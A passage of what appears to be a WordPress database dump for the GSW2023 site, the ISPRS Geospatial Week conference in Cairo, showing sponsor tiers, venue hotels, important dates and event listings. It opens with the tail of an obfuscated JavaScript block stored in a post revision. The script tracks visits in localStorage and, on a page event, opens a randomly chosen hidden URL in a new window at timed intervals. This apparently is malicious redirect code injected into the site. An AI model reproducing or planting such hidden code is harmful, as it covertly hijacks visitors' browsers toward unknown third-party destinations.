_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-10 00:35:47','2023-07-10 00:35:47','',3066,'https://gsw2023.com/?p=4981',0,'revision','',0),
(4982,1,'2023-07-10 00:36:33','2023-07-10 00:36:33','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be 